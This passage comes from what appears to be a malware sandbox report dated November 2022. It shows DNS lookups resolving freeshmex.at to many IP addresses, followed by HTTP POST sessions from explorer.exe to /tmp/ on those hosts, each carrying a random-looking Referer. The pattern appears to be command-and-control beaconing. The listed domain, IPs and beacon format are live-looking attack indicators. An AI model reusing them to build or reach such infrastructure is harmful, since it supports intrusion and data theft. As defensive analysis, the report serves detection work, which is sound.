                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:29.651410103 CET8.8.8.8192.168.2.40x6a41No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:30.784167051 CET8.8.8.8192.168.2.40x76faNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:32.024302959 CET8.8.8.8192.168.2.40xfed9No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.421724081 CET8.8.8.8192.168.2.40x8cadNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:33.736593008 CET8.8.8.8192.168.2.40xddb5No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.258749962 CET8.8.8.8192.168.2.40xe7fcNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:34.668950081 CET8.8.8.8192.168.2.40xc9b3No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:35.443448067 CET8.8.8.8192.168.2.40x5996No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    0 | 192.168.2.4 | 49715 | 5.135.247.111 | 443 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    1 | 192.168.2.4 | 49696 | 190.140.74.43 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:00.375032902 CET | 137 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://crimlvf.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 167
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:01.250077009 CET | 137 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:00 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 8
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 04 00 00 00 72 e8 87 ed
                    Data Ascii: r


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    10 | 192.168.2.4 | 49705 | 211.53.230.67 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:16.678010941 CET | 1242 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://yvudclyoxi.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 338
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:17.809726000 CET | 1242 | IN | HTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:17 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    11 | 192.168.2.4 | 49706 | 211.53.230.67 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:18.988473892 CET | 1244 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://ewydclhcm.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 331
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:20.226175070 CET | 1245 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:19 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    12 | 192.168.2.4 | 49707 | 211.53.230.67 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:20.512118101 CET | 1246 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://ufwbup.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 222
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:21.587198019 CET | 1247 | IN | HTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:21 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    13 | 192.168.2.4 | 49708 | 109.102.255.230 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:21.673352003 CET | 1247 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://dmwhplnj.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 241
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:21.905081987 CET | 1249 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:21 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    14 | 192.168.2.4 | 49709 | 95.107.163.44 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:22.005279064 CET | 1250 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://xrqcl.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 211
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:22.236107111 CET | 1250 | IN | HTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:22 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    15 | 192.168.2.4 | 49710 | 211.171.233.129 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:22.518984079 CET | 1251 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://uuvtnsw.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 183
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:23.829354048 CET | 1255 | IN | HTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:23 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    16 | 192.168.2.4 | 49712 | 211.53.230.67 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:24.102689028 CET | 1256 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://fffclev.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 243
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:25.188854933 CET | 1257 | IN | HTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:24 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    17 | 192.168.2.4 | 49713 | 178.31.176.42 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 24, 2022 20:13:25.529270887 CET | 1258 | OUT | POST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://ykhdc.net/
